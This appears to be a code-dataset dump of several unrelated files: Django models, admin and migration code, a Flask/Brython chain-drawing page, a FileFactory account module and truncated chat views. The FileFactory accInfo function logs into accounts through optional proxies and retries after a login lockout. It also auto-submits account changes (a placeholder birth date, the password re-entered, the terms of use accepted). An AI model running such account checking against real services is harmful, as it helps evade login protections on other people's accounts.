return self.first_name
def activation_expired(self):
"""
Check if user's activation has expired.
:return: boolean
"""
return self.date_joined + timedelta(days=settings.ACCOUNT_ACTIVATION_DAYS) < timezone.now()
def confirm_email(self):
"""
Confirm email.
:return: boolean
"""
if not self.activation_expired() and not self.confirmed_email:
self.confirmed_email = True
self.save()
return True
return False
|
mit
| -9,196,402,323,068,319,000 | 29.657718 | 108 | 0.59282 | false | 4.175503 | false | false | false |
greggian/TapdIn
|
django/contrib/flatpages/admin.py
|
1
|
1100
|
from django import forms
from django.contrib import admin
from django.contrib.flatpages.models import FlatPage
from django.utils.translation import ugettext_lazy as _
class FlatpageForm(forms.ModelForm):
url = forms.RegexField(label=_("URL"), max_length=100, regex=r'^[-\w/]+$',
help_text = _("Example: '/about/contact/'. Make sure to have leading"
" and trailing slashes."),
error_message = _("This value must contain only letters, numbers,"
" underscores, dashes or slashes."))
class Meta:
model = FlatPage
class FlatPageAdmin(admin.ModelAdmin):
form = FlatpageForm
fieldsets = (
(None, {'fields': ('url', 'title', 'content', 'sites')}),
(_('Advanced options'), {'classes': ('collapse',), 'fields': ('enable_comments', 'registration_required', 'template_name')}),
)
list_display = ('url', 'title')
list_filter = ('sites', 'enable_comments', 'registration_required')
search_fields = ('url', 'title')
admin.site.register(FlatPage, FlatPageAdmin)
|
apache-2.0
| 7,297,535,413,985,754,000 | 37.285714 | 133 | 0.615455 | false | 4.11985 | false | false | false |
2015fallhw/cdw11
|
users/b/g11/bg11_40323247.py
|
1
|
20505
|
# 各組分別在各自的 .py 程式中建立應用程式 (第1步/總共3步)
from flask import Blueprint, render_template, make_response
# 利用 Blueprint建立 ag1, 並且 url 前綴為 /ag1, 並設定 template 存放目錄
bg11_40323247 = Blueprint('bg11_40323247', __name__, url_prefix='/bg11_40323247', template_folder='templates')
@bg11_40323247.route('/task47_1')
def task47_1():
outstring = '''
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>網際 2D 繪圖</title>
<!-- IE 9: display inline SVG -->
<meta http-equiv="X-UA-Compatible" content="IE=9">
<script type="text/javascript" src="http://brython.info/src/brython_dist.js"></script>
<script type="text/javascript" src="http://cptocadp-2015fallhw.rhcloud.com/static/Cango-8v03.js"></script>
<script type="text/javascript" src="http://cptocadp-2015fallhw.rhcloud.com/static/Cango2D-6v13.js"></script>
<script type="text/javascript" src="http://cptocadp-2015fallhw.rhcloud.com/static/CangoAxes-1v33.js"></script>
</head>
<body>
<script>
window.onload=function(){
brython(1);
}
</script>
<canvas id="plotarea" width="800" height="800"></canvas>
<script type="text/python">
from javascript import JSConstructor
from browser import alert
from browser import window
import math
cango = JSConstructor(window.Cango)
cobj = JSConstructor(window.Cobj)
shapedefs = window.shapeDefs
obj2d = JSConstructor(window.Obj2D)
cgo = cango("plotarea")
cgo.setWorldCoords(-250, -250, 500, 500)
# 畫軸線
cgo.drawAxes(0, 240, 0, 240, {
"strokeColor":"#aaaaaa",
"fillColor": "#aaaaaa",
"xTickInterval": 20,
"xLabelInterval": 20,
"yTickInterval": 20,
"yLabelInterval": 20})
deg = math.pi/180
class chain():
# 輪廓的外型設為成員變數
chamber = "M -6.8397, -1.4894 \
A 7, 7, 0, 1, 0, 6.8397, -1.4894 \
A 40, 40, 0, 0, 1, 6.8397, -18.511 \
A 7, 7, 0, 1, 0, -6.8397, -18.511 \
A 40, 40, 0, 0, 1, -6.8397, -1.4894 z"
cgoChamber = window.svgToCgoSVG(chamber)
# 利用鏈條起點與終點定義繪圖, 使用內定的 color, border 與 linewidth 變數
def basic(self, x1, y1, x2, y2, color="green", border=True, linewidth=4, scale=1):
self.x1 = x1
self.y1 = y1
self.x2 = x2
self.y2 = y2
self.color = color
self.border = border
self.linewidth = linewidth
self.scale = scale
# 注意, cgo.Chamber 為成員變數
cmbr = cobj(self.cgoChamber, "SHAPE", {
"fillColor": color,
"border": border,
"strokeColor": "tan",
"lineWidth": linewidth })
# hole 為原點位置
hole = cobj(shapedefs.circle(4), "PATH")
cmbr.appendPath(hole)
# 複製 cmbr, 然後命名為 basic1
basic1 = cmbr.dup()
# 因為鏈條的角度由原點向下垂直, 所以必須轉 90 度, 再考量 atan2 的轉角
basic1.rotate(math.atan2(y2-y1, x2-x1)/deg+90)
# 放大 scale 倍
cgo.render(basic1, x1, y1, scale, 0)
# 利用鏈條起點與旋轉角度定義繪圖, 使用內定的 color, border 與 linewidth 變數
def basic_rot(self, x1, y1, rot, color="green", border=True, linewidth=4, scale=1):
self.x1 = x1
self.y1 = y1
self.rot = rot
self.color = color
self.border = border
self.linewidth = linewidth
self.scale = scale
# 注意, cgo.Chamber 為成員變數
cmbr = cobj(self.cgoChamber, "SHAPE", {
"fillColor": color,
"border": border,
"strokeColor": "tan",
"lineWidth": linewidth })
# hole 為原點位置
hole = cobj(shapedefs.circle(4), "PATH")
cmbr.appendPath(hole)
# 根據旋轉角度, 計算 x2 與 y2
x2 = x1 + 20*math.cos(rot*deg)
y2 = y1 + 20*math.sin(rot*deg)
# 複製 cmbr, 然後命名為 basic1
basic1 = cmbr.dup()
# 因為鏈條的角度由原點向下垂直, 所以必須轉 90 度, 再考量 atan2 的轉角
basic1.rotate(rot+90)
# 放大 scale 倍
cgo.render(basic1, x1, y1, scale, 0)
return x2, y2
# 利用 chain class 建立案例, 對應到 mychain 變數
mychain = chain()
# 畫 A
# 左邊兩個垂直單元
x1, y1 = mychain.basic_rot(0, 0, 90)
x2, y2 = mychain.basic_rot(x1, y1, 90)
# 左斜邊兩個單元
x3, y3 = mychain.basic_rot(x2, y2, 80)
x4, y4 = mychain.basic_rot(x3, y3, 71)
# 最上方水平單元
x5, y5 = mychain.basic_rot(x4, y4, 0)
# 右斜邊兩個單元
x6, y6 = mychain.basic_rot(x5, y5, -71)
x7, y7 = mychain.basic_rot(x6, y6, -80)
# 右邊兩個垂直單元
x8, y8 = mychain.basic_rot(x7, y7, -90)
x9, y9 = mychain.basic_rot(x8, y8, -90)
# 中間兩個水平單元
x10, y10 = mychain.basic_rot(x8, y8, -180)
mychain.basic(x10, y10, x1, y1, color="green")
cgo.setWorldCoords(-315, -250, 500, 500)
# 畫 A
# 左邊兩個垂直單元
x1, y1 = mychain.basic_rot(0, 0, 90)
x2, y2 = mychain.basic_rot(x1, y1, 90)
# 左斜邊兩個單元
x3, y3 = mychain.basic_rot(x2, y2, 80)
x4, y4 = mychain.basic_rot(x3, y3, 71)
# 最上方水平單元
x5, y5 = mychain.basic_rot(x4, y4, 0)
# 右斜邊兩個單元
x6, y6 = mychain.basic_rot(x5, y5, -71)
x7, y7 = mychain.basic_rot(x6, y6, -80)
# 右邊兩個垂直單元
x8, y8 = mychain.basic_rot(x7, y7, -90)
x9, y9 = mychain.basic_rot(x8, y8, -90)
# 中間兩個水平單元
x10, y10 = mychain.basic_rot(x8, y8, -180)
mychain.basic(x10, y10, x1, y1, color="blue")
cgo.setWorldCoords(-385, -250, 500, 500)
# 畫 A
# 左邊兩個垂直單元
x1, y1 = mychain.basic_rot(0, 0, 90)
x2, y2 = mychain.basic_rot(x1, y1, 90)
# 左斜邊兩個單元
x3, y3 = mychain.basic_rot(x2, y2, 80)
x4, y4 = mychain.basic_rot(x3, y3, 71)
# 最上方水平單元
x5, y5 = mychain.basic_rot(x4, y4, 0)
# 右斜邊兩個單元
x6, y6 = mychain.basic_rot(x5, y5, -71)
x7, y7 = mychain.basic_rot(x6, y6, -80)
# 右邊兩個垂直單元
x8, y8 = mychain.basic_rot(x7, y7, -90)
x9, y9 = mychain.basic_rot(x8, y8, -90)
# 中間兩個水平單元
x10, y10 = mychain.basic_rot(x8, y8, -180)
mychain.basic(x10, y10, x1, y1, color="red")
cgo.setWorldCoords(-445, -250, 500, 500)
# 畫 A
# 左邊兩個垂直單元
x1, y1 = mychain.basic_rot(0, 0, 90)
x2, y2 = mychain.basic_rot(x1, y1, 90)
# 左斜邊兩個單元
x3, y3 = mychain.basic_rot(x2, y2, 80)
x4, y4 = mychain.basic_rot(x3, y3, 71)
# 最上方水平單元
x5, y5 = mychain.basic_rot(x4, y4, 0)
# 右斜邊兩個單元
x6, y6 = mychain.basic_rot(x5, y5, -71)
x7, y7 = mychain.basic_rot(x6, y6, -80)
# 右邊兩個垂直單元
x8, y8 = mychain.basic_rot(x7, y7, -90)
x9, y9 = mychain.basic_rot(x8, y8, -90)
# 中間兩個水平單元
x10, y10 = mychain.basic_rot(x8, y8, -180)
mychain.basic(x10, y10, x1, y1, color="green")
</script>
</body></html>
'''
return outstring
@bg11_40323247.route('/task47_2')
def task47_2():
outstring = '''
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>網際 2D 繪圖</title>
<!-- IE 9: display inline SVG -->
<meta http-equiv="X-UA-Compatible" content="IE=9">
<script type="text/javascript" src="http://brython.info/src/brython_dist.js"></script>
<script type="text/javascript" src="http://cptocadp-2015fallhw.rhcloud.com/static/Cango-8v03.js"></script>
<script type="text/javascript" src="http://cptocadp-2015fallhw.rhcloud.com/static/Cango2D-6v13.js"></script>
<script type="text/javascript" src="http://cptocadp-2015fallhw.rhcloud.com/static/CangoAxes-1v33.js"></script>
</head>
<body>
<script>
window.onload=function(){
brython(1);
}
</script>
<canvas id="plotarea" width="800" height="800"></canvas>
<script type="text/python">
from javascript import JSConstructor
from browser import alert
from browser import window
import math
cango = JSConstructor(window.Cango)
cobj = JSConstructor(window.Cobj)
shapedefs = window.shapeDefs
obj2d = JSConstructor(window.Obj2D)
cgo = cango("plotarea")
cgo.setWorldCoords(-40, -250, 500, 500)
# 畫軸線
cgo.drawAxes(0, 240, 0, 240, {
"strokeColor":"#aaaaaa",
"fillColor": "#aaaaaa",
"xTickInterval": 20,
"xLabelInterval": 20,
"yTickInterval": 20,
"yLabelInterval": 20})
deg = math.pi/180
class chain():
# 輪廓的外型設為成員變數
chamber = "M -6.8397, -1.4894 \
A 7, 7, 0, 1, 0, 6.8397, -1.4894 \
A 40, 40, 0, 0, 1, 6.8397, -18.511 \
A 7, 7, 0, 1, 0, -6.8397, -18.511 \
A 40, 40, 0, 0, 1, -6.8397, -1.4894 z"
cgoChamber = window.svgToCgoSVG(chamber)
# 利用鏈條起點與終點定義繪圖, 使用內定的 color, border 與 linewidth 變數
def basic(self, x1, y1, x2, y2, color="green", border=True, linewidth=4, scale=1):
self.x1 = x1
self.y1 = y1
self.x2 = x2
self.y2 = y2
self.color = color
self.border = border
self.linewidth = linewidth
self.scale = scale
# 注意, cgo.Chamber 為成員變數
cmbr = cobj(self.cgoChamber, "SHAPE", {
"fillColor": color,
"border": border,
"strokeColor": "tan",
"lineWidth": linewidth })
# hole 為原點位置
hole = cobj(shapedefs.circle(4), "PATH")
cmbr.appendPath(hole)
# 複製 cmbr, 然後命名為 basic1
basic1 = cmbr.dup()
# 因為鏈條的角度由原點向下垂直, 所以必須轉 90 度, 再考量 atan2 的轉角
basic1.rotate(math.atan2(y2-y1, x2-x1)/deg+90)
# 放大 scale 倍
cgo.render(basic1, x1, y1, scale, 0)
# 利用鏈條起點與旋轉角度定義繪圖, 使用內定的 color, border 與 linewidth 變數
def basic_rot(self, x1, y1, rot, color="green", border=True, linewidth=4, scale=1):
self.x1 = x1
self.y1 = y1
self.rot = rot
self.color = color
self.border = border
self.linewidth = linewidth
self.scale = scale
# 注意, cgo.Chamber 為成員變數
cmbr = cobj(self.cgoChamber, "SHAPE", {
"fillColor": color,
"border": border,
"strokeColor": "tan",
"lineWidth": linewidth })
# hole 為原點位置
hole = cobj(shapedefs.circle(4), "PATH")
cmbr.appendPath(hole)
# 根據旋轉角度, 計算 x2 與 y2
x2 = x1 + 20*math.cos(rot*deg)
y2 = y1 + 20*math.sin(rot*deg)
# 複製 cmbr, 然後命名為 basic1
basic1 = cmbr.dup()
# 因為鏈條的角度由原點向下垂直, 所以必須轉 90 度, 再考量 atan2 的轉角
basic1.rotate(rot+90)
# 放大 scale 倍
cgo.render(basic1, x1, y1, scale, 0)
return x2, y2
# 利用 chain class 建立案例, 對應到 mychain 變數
mychain = chain()
# 畫 B
# 左邊四個垂直單元
x1, y1 = mychain.basic_rot(0, 0, 90)
x2, y2 = mychain.basic_rot(x1, y1, 90)
x3, y3 = mychain.basic_rot(x2, y2, 90)
x4, y4 = mychain.basic_rot(x3, y3, 90)
# 上方一個水平單元
x5, y5 = mychain.basic_rot(x4, y4, 0)
# 右斜 -30 度
x6, y6 = mychain.basic_rot(x5, y5, -30)
# 右上垂直向下單元
x7, y7 = mychain.basic_rot(x6, y6, -90)
# 右斜 240 度
x8, y8 = mychain.basic_rot(x7, y7, 210)
# 中間水平
mychain.basic(x8, y8, x2, y2)
# 右下斜 -30 度
x10, y10 = mychain.basic_rot(x8, y8, -30)
# 右下垂直向下單元
x11, y11 = mychain.basic_rot(x10, y10, -90)
# 右下斜 240 度
x12, y12 = mychain.basic_rot(x11, y11, 210)
# 水平接回起點
mychain.basic(x12,y12, 0, 0, color="green")
cgo.setWorldCoords(-107.5, -250, 500, 500)
# 畫 A
# 左邊兩個垂直單元
x1, y1 = mychain.basic_rot(0, 0, 90)
x2, y2 = mychain.basic_rot(x1, y1, 90)
# 左斜邊兩個單元
x3, y3 = mychain.basic_rot(x2, y2, 80)
x4, y4 = mychain.basic_rot(x3, y3, 71)
# 最上方水平單元
x5, y5 = mychain.basic_rot(x4, y4, 0)
# 右斜邊兩個單元
x6, y6 = mychain.basic_rot(x5, y5, -71)
x7, y7 = mychain.basic_rot(x6, y6, -80)
# 右邊兩個垂直單元
x8, y8 = mychain.basic_rot(x7, y7, -90)
x9, y9 = mychain.basic_rot(x8, y8, -90)
# 中間兩個水平單元
x10, y10 = mychain.basic_rot(x8, y8, -180)
mychain.basic(x10, y10, x1, y1, color="green")
cgo.setWorldCoords(-50, -250, 500, 500)
# 畫 C
# 上半部
# 左邊中間垂直起點, 圓心位於線段中央, y 方向再向上平移兩個鏈條圓心距單位
x1, y1 = mychain.basic_rot(0+65*2, -10+10+20*math.sin(80*deg)+20*math.sin(30*deg), 90)
# 上方轉 80 度
x2, y2 = mychain.basic_rot(x1, y1, 80)
# 上方轉 30 度
x3, y3 = mychain.basic_rot(x2, y2, 30)
# 上方水平
x4, y4 = mychain.basic_rot(x3, y3, 0)
# 下半部, 從起點開始 -80 度
x5, y5 = mychain.basic_rot(0+65*2, -10+10+20*math.sin(80*deg)+20*math.sin(30*deg), -80)
# 下斜 -30 度
x6, y6 = mychain.basic_rot(x5, y5, -30)
# 下方水平單元
x7, y7 = mychain.basic_rot(x6, y6, -0, color="green")
cgo.setWorldCoords(-55, -250, 500, 500)
# 畫 D
# 左邊四個垂直單元
x1, y1 = mychain.basic_rot(0+65*3, 0, 90)
x2, y2 = mychain.basic_rot(x1, y1, 90)
x3, y3 = mychain.basic_rot(x2, y2, 90)
x4, y4 = mychain.basic_rot(x3, y3, 90)
# 上方一個水平單元
x5, y5 = mychain.basic_rot(x4, y4, 0)
# 右斜 -40 度
x6, y6 = mychain.basic_rot(x5, y5, -40)
x7, y7 = mychain.basic_rot(x6, y6, -60)
# 右中垂直向下單元
x8, y8 = mychain.basic_rot(x7, y7, -90)
# -120 度
x9, y9 = mychain.basic_rot(x8, y8, -120)
# -140
x10, y10 = mychain.basic_rot(x9, y9, -140)
# 水平接回原點
mychain.basic(x10, y10, 0+65*3, 0, color="green")
</script>
</body></html>
'''
return outstring
@bg11_40323247.route('/task47_3')
def task47_3():
outstring = '''
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>網際 2D 繪圖</title>
<!-- IE 9: display inline SVG -->
<meta http-equiv="X-UA-Compatible" content="IE=9">
<script type="text/javascript" src="http://brython.info/src/brython_dist.js"></script>
<script type="text/javascript" src="http://cptocadp-2015fallhw.rhcloud.com/static/Cango-8v03.js"></script>
<script type="text/javascript" src="http://cptocadp-2015fallhw.rhcloud.com/static/Cango2D-6v13.js"></script>
<script type="text/javascript" src="http://cptocadp-2015fallhw.rhcloud.com/static/CangoAxes-1v33.js"></script>
</head>
<body>
<script>
window.onload=function(){
brython(1);
}
</script>
<canvas id="plotarea" width="800" height="800"></canvas>
<script type="text/python">
from javascript import JSConstructor
from browser import alert
from browser import window
import math
cango = JSConstructor(window.Cango)
cobj = JSConstructor(window.Cobj)
shapedefs = window.shapeDefs
obj2d = JSConstructor(window.Obj2D)
cgo = cango("plotarea")
cgo.setWorldCoords(-250, -250, 500, 500)
# 畫軸線
cgo.drawAxes(0, 240, 0, 240, {
"strokeColor":"#aaaaaa",
"fillColor": "#aaaaaa",
"xTickInterval": 20,
"xLabelInterval": 20,
"yTickInterval": 20,
"yLabelInterval": 20})
deg = math.pi/180
# 將繪製鏈條輪廓的內容寫成 class 物件
class chain():
# 輪廓的外型設為成員變數
chamber = "M -6.8397, -1.4894 \
A 7, 7, 0, 1, 0, 6.8397, -1.4894 \
A 40, 40, 0, 0, 1, 6.8397, -18.511 \
A 7, 7, 0, 1, 0, -6.8397, -18.511 \
A 40, 40, 0, 0, 1, -6.8397, -1.4894 z"
cgoChamber = window.svgToCgoSVG(chamber)
# 利用鏈條起點與終點定義繪圖, 使用內定的 color, border 與 linewidth 變數
def basic(self, x1, y1, x2, y2, color="green", border=True, linewidth=4, scale=1):
self.x1 = x1
self.y1 = y1
self.x2 = x2
self.y2 = y2
self.color = color
self.border = border
self.linewidth = linewidth
self.scale = scale
# 注意, cgo.Chamber 為成員變數
cmbr = cobj(self.cgoChamber, "SHAPE", {
"fillColor": color,
"border": border,
"strokeColor": "tan",
"lineWidth": linewidth })
# hole 為原點位置
hole = cobj(shapedefs.circle(4), "PATH")
cmbr.appendPath(hole)
# 複製 cmbr, 然後命名為 basic1
basic1 = cmbr.dup()
# 因為鏈條的角度由原點向下垂直, 所以必須轉 90 度, 再考量 atan2 的轉角
basic1.rotate(math.atan2(y2-y1, x2-x1)/deg+90)
# 放大 scale 倍
cgo.render(basic1, x1, y1, scale, 0)
# 利用鏈條起點與旋轉角度定義繪圖, 使用內定的 color, border 與 linewidth 變數
def basic_rot(self, x1, y1, rot, color="green", border=True, linewidth=4, scale=1):
self.x1 = x1
self.y1 = y1
self.rot = rot
self.color = color
self.border = border
self.linewidth = linewidth
self.scale = scale
# 注意, cgo.Chamber 為成員變數
cmbr = cobj(self.cgoChamber, "SHAPE", {
"fillColor": color,
"border": border,
"strokeColor": "tan",
"lineWidth": linewidth })
# hole 為原點位置
hole = cobj(shapedefs.circle(4), "PATH")
cmbr.appendPath(hole)
# 根據旋轉角度, 計算 x2 與 y2
x2 = x1 + 20*math.cos(rot*deg)
y2 = y1 + 20*math.sin(rot*deg)
# 複製 cmbr, 然後命名為 basic1
basic1 = cmbr.dup()
# 因為鏈條的角度由原點向下垂直, 所以必須轉 90 度, 再考量 atan2 的轉角
basic1.rotate(rot+90)
# 放大 scale 倍
cgo.render(basic1, x1, y1, scale, 0)
return x2, y2
# 利用 chain class 建立案例, 對應到 mychain 變數
mychain = chain()
# 畫 B
# 左邊四個垂直單元
x1, y1 = mychain.basic_rot(0, 0, 90)
x2, y2 = mychain.basic_rot(x1, y1, 90)
x3, y3 = mychain.basic_rot(x2, y2, 90)
x4, y4 = mychain.basic_rot(x3, y3, 90)
# 上方一個水平單元
x5, y5 = mychain.basic_rot(x4, y4, 0)
# 右斜 -30 度
x6, y6 = mychain.basic_rot(x5, y5, -30)
# 右上垂直向下單元
x7, y7 = mychain.basic_rot(x6, y6, -90)
# 右斜 240 度
x8, y8 = mychain.basic_rot(x7, y7, 210)
# 中間水平
mychain.basic(x8, y8, x2, y2)
# 右下斜 -30 度
x10, y10 = mychain.basic_rot(x8, y8, -30)
# 右下垂直向下單元
x11, y11 = mychain.basic_rot(x10, y10, -90)
# 右下斜 240 度
x12, y12 = mychain.basic_rot(x11, y11, 210)
# 水平接回起點
mychain.basic(x12,y12, 0, 0, color="green")
cgo.setWorldCoords(-247.5, -350, 500, 500)
# 畫 A
# 左邊兩個垂直單元
x1, y1 = mychain.basic_rot(0, 0, 90)
x2, y2 = mychain.basic_rot(x1, y1, 90)
# 左斜邊兩個單元
x3, y3 = mychain.basic_rot(x2, y2, 80)
x4, y4 = mychain.basic_rot(x3, y3, 71)
# 最上方水平單元
x5, y5 = mychain.basic_rot(x4, y4, 0)
# 右斜邊兩個單元
x6, y6 = mychain.basic_rot(x5, y5, -71)
x7, y7 = mychain.basic_rot(x6, y6, -80)
# 右邊兩個垂直單元
x8, y8 = mychain.basic_rot(x7, y7, -90)
x9, y9 = mychain.basic_rot(x8, y8, -90)
# 中間兩個水平單元
x10, y10 = mychain.basic_rot(x8, y8, -180)
mychain.basic(x10, y10, x1, y1, color="green")
cgo.setWorldCoords(-55, -50, 500, 500)
# 畫 D
# 左邊四個垂直單元
x1, y1 = mychain.basic_rot(0+65*3, 0, 90)
x2, y2 = mychain.basic_rot(x1, y1, 90)
x3, y3 = mychain.basic_rot(x2, y2, 90)
x4, y4 = mychain.basic_rot(x3, y3, 90)
# 上方一個水平單元
x5, y5 = mychain.basic_rot(x4, y4, 0)
# 右斜 -40 度
x6, y6 = mychain.basic_rot(x5, y5, -40)
x7, y7 = mychain.basic_rot(x6, y6, -60)
# 右中垂直向下單元
x8, y8 = mychain.basic_rot(x7, y7, -90)
# -120 度
x9, y9 = mychain.basic_rot(x8, y8, -120)
# -140
x10, y10 = mychain.basic_rot(x9, y9, -140)
# 水平接回原點
mychain.basic(x10, y10, 0+65*3, 0, color="green")
cgo.setWorldCoords(-120, -150, 500, 500)
# 畫 C
# 上半部
# 左邊中間垂直起點, 圓心位於線段中央, y 方向再向上平移兩個鏈條圓心距單位
x1, y1 = mychain.basic_rot(0+65*2, -10+10+20*math.sin(80*deg)+20*math.sin(30*deg), 90)
# 上方轉 80 度
x2, y2 = mychain.basic_rot(x1, y1, 80)
# 上方轉 30 度
x3, y3 = mychain.basic_rot(x2, y2, 30)
# 上方水平
x4, y4 = mychain.basic_rot(x3, y3, 0)
# 下半部, 從起點開始 -80 度
x5, y5 = mychain.basic_rot(0+65*2, -10+10+20*math.sin(80*deg)+20*math.sin(30*deg), -80)
# 下斜 -30 度
x6, y6 = mychain.basic_rot(x5, y5, -30)
# 下方水平單元
x7, y7 = mychain.basic_rot(x6, y6, -0, color="green")
</script>
</body></html>
'''
return outstring
|
agpl-3.0
| -2,091,752,563,251,680,500 | 27.446708 | 110 | 0.607912 | false | 1.908011 | false | false | false |
oczkers/gdown
|
gdown/modules/filefactory.py
|
1
|
5668
|
# -*- coding: utf-8 -*-
"""
gdown.modules.filefactory
~~~~~~~~~~~~~~~~~~~
This module contains handlers for filefactory.
"""
import re
from datetime import datetime
from dateutil import parser
from time import sleep
from ..module import browser, acc_info_template
from ..exceptions import ModuleError
def upload(username, passwd, filename):
"""Returns uploaded file url."""
r = browser()
r.post('http://www.filefactory.com/member/signin.php', {'loginEmail': username, 'loginPassword': passwd, 'Submit': 'Sign In'}) # login to get ff_membership cookie
# host = r.get('http://www.filefactory.com/servers.php?single=1').text # get best server to upload
host = 'http://upload.filefactory.com/upload.php' # always returning the same url (?)
viewhash = re.search('<viewhash>(.+)</viewhash>', r.get('http://www.filefactory.com/upload/upload_flash_begin.php?files=1').text).group(1) # get viewhash
r.post('%s/upload_flash.php?viewhash=%s' % (host, viewhash), {'Filename': filename, 'Upload': 'Submit Query'}, files={'file': open(filename, 'rb')}).text # upload
return 'http://www.filefactory.com/file/%s/n/%s' % (viewhash, filename)
def accInfo(username, passwd, date_birth=False, proxy=False):
"""Returns account info."""
acc_info = acc_info_template()
r = browser(proxy)
data = {'loginEmail': username,
'loginPassword': passwd,
'Submit': 'Sign In'}
content = r.post('https://www.filefactory.com/member/signin.php', data=data).text
open('gdown.log', 'w').write(content)
# TODO: language
if r.cookies['locale'] != 'en_US.utf8':
print('language changing to en')
data = {'func': 'locale',
# 'redirect': '/account/',
'settingsLanguage': 'en_US.utf8',
'Submit': ''}
content = r.post('http://filefactory.com/account/index.php', data=data).text
open('gdown1.log', 'w').write(content)
if 'What is your date of birth?' in content:
if not date_birth:
# raise ModuleError('Birth date not set.')
acc_info['status'] = 'free'
return acc_info
print('date birth',) # DEBUG
content = r.post('https://www.filefactory.com/member/setdob.php', {'newDobMonth': '1', 'newDobDay': '1', 'newDobYear': '1970', 'Submit': 'Continue'}).text
open('gdown.log', 'w').write(content)
if 'Please Update your Password' in content:
if not date_birth:
# raise ModuleError('Password has to be updated.')
acc_info['status'] = 'free'
return acc_info
print('password resetting',) # DEBUG
content = r.post('https://www.filefactory.com/member/setpwd.php', {'dobMonth': '1', 'dobDay': '1', 'dobYear': '1970', 'newPassword': passwd, 'Submit': 'Continue'}).text
open('gdown.log', 'w').write(content)
if 'Your Date of Birth was incorrect.' in content:
print('wrong date birth',) # DEBUG
acc_info['status'] = 'free'
return acc_info
elif 'You have been signed out of your account due to a change being made to one of your core account settings. Please sign in again.' in content or 'Your password has been changed successfully' in content:
print('relogging after password reset',) # DEBUG
sleep(5)
return accInfo(username, passwd)
if 'Review Acceptable Use Policy' in content: # new policy
print('new policy')
content = r.post('https://www.filefactory.com/member/settos.php', data={'agree': '1', 'Submit': 'I understand'}).text()
if 'Account Pending Deletion' in content or 'The Email Address submitted was invalid' in content or 'The email address or password you have entered is incorrect.' in content:
acc_info['status'] = 'deleted'
return acc_info
elif 'Too Many Failed Sign In Attempts' in content:
# raise ModuleError('ip banned')
# print('ip banned') # DEBUG
sleep(30)
return accInfo(username=username, passwd=passwd, proxy=proxy)
content = r.get('https://www.filefactory.com/account/').text
if '<strong>Free Member</strong>' in content or '<strong>Kostenloses Mitglied</strong>' in content or '<strong>Membro Gratuito</strong>' in content:
acc_info['status'] = 'free'
return acc_info
elif any(i in content for i in ('The account you are trying to use has been deleted.', 'This account has been automatically suspended due to account sharing.', 'The account you have tried to sign into is pending deletion.', 'Your FileFactory Account Has Been Temporarily Suspended')):
acc_info['status'] = 'blocked'
return acc_info
elif any(i in content for i in ('The email or password you have entered is incorrect', 'The email or password wre invalid. Please try again.', 'The Email Address submitted was invalid', 'The email address or password you have entered is incorrect.')):
acc_info['status'] = 'deleted'
return acc_info
elif 'title="Premium valid until:' in content:
acc_info['status'] = 'premium'
acc_info['expire_date'] = parser.parse(re.search('title="Premium valid until: <strong>(.+?)</strong>">', content).group(1))
return acc_info
elif "Congratulations! You're a FileFactory Lifetime member. We value your loyalty and support." in content or '<strong>Lifetime</strong>' in content:
acc_info['status'] = 'premium'
acc_info['expire_date'] = datetime.max
return acc_info
else:
open('gdown.log', 'w').write(content)
raise ModuleError('Unknown error, full log in gdown.log')
|
gpl-3.0
| -7,907,263,448,037,048,000 | 50.063063 | 288 | 0.638497 | false | 3.751158 | false | false | false |
parksandwildlife/wastd
|
occurrence/migrations/0034_auto_20190507_1222.py
|
1
|
2843
|
# Generated by Django 2.1.7 on 2019-05-07 04:22
from django.db import migrations, models
import django.db.models.deletion
import uuid
class Migration(migrations.Migration):
dependencies = [
('occurrence', '0033_auto_20190506_1347'),
]
operations = [
migrations.CreateModel(
name='AnimalSex',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('code', models.SlugField(help_text='A unique, url-safe code.', max_length=500, unique=True, verbose_name='Code')),
('label', models.CharField(blank=True, help_text='A human-readable, self-explanatory label.', max_length=500, null=True, verbose_name='Label')),
('description', models.TextField(blank=True, help_text='A comprehensive description.', null=True, verbose_name='Description')),
],
options={
'ordering': ['code'],
'abstract': False,
},
),
migrations.AlterModelOptions(
name='animalobservation',
options={'verbose_name': 'Animal Observation', 'verbose_name_plural': 'Animal Observations'},
),
migrations.AlterModelOptions(
name='habitatcomposition',
options={'verbose_name': 'Habitat Composition', 'verbose_name_plural': 'Habitat Compositions'},
),
migrations.AlterModelOptions(
name='habitatcondition',
options={'verbose_name': 'Habitat Condition', 'verbose_name_plural': 'Habitat Conditions'},
),
migrations.AlterModelOptions(
name='physicalsample',
options={'verbose_name': 'Physical Sample', 'verbose_name_plural': 'Physical Samples'},
),
migrations.AlterModelOptions(
name='plantcount',
options={'verbose_name': 'Plant Count', 'verbose_name_plural': 'Plant Counts'},
),
migrations.AlterModelOptions(
name='vegetationclassification',
options={'verbose_name': 'Vegetation Classification', 'verbose_name_plural': 'Vegetation Classifications'},
),
migrations.AlterField(
model_name='areaencounter',
name='source_id',
field=models.CharField(default=uuid.UUID('b6e9dd1a-707f-11e9-a870-ecf4bb19b5fc'), help_text='The ID of the record in the original source, if available.', max_length=1000, verbose_name='Source ID'),
),
migrations.AddField(
model_name='animalobservation',
name='sex',
field=models.ForeignKey(blank=True, help_text='The sex of the primary observed animal.', null=True, on_delete=django.db.models.deletion.CASCADE, to='occurrence.AnimalSex', verbose_name='Animal Sex'),
),
]
|
mit
| 1,233,837,931,145,389,300 | 44.854839 | 211 | 0.610623 | false | 4.12627 | false | false | false |
willre/homework
|
day21-22/webChat/webChat_master/views.py
|
1
|
3580
|
# -*- coding:utf-8 -*-
import json
import Queue
import time
from django.shortcuts import render,HttpResponseRedirect,HttpResponse
from django.contrib.auth import authenticate,login,logout
from webChat_forms.loginFrom import userLoginFrom
from django.contrib.auth.decorators import login_required
from webChat_models import models
# Create your views here.
GLOBAL_MQ = {}
def indexPage(request):
loginFrom = userLoginFrom()
return render(request,"index.html",{"loginFrom":loginFrom})
@login_required
def chatPage(request):
return render(request,"chat.html")
def loadContacts(request):
contact_dic = {}
url_path = request.path
print url_path,"asd"
contact_dic["single"] = list(request.user.userprofile.friends.select_related().values("id","name","description"))
contact_dic["group"] = list(request.user.userprofile.user_group_set.select_related().values("id","name","description"))
print json.dumps( contact_dic)
return HttpResponse(json.dumps(contact_dic))
def new_msg(request):
# 用户向server 提交数据
if request.method=="POST":
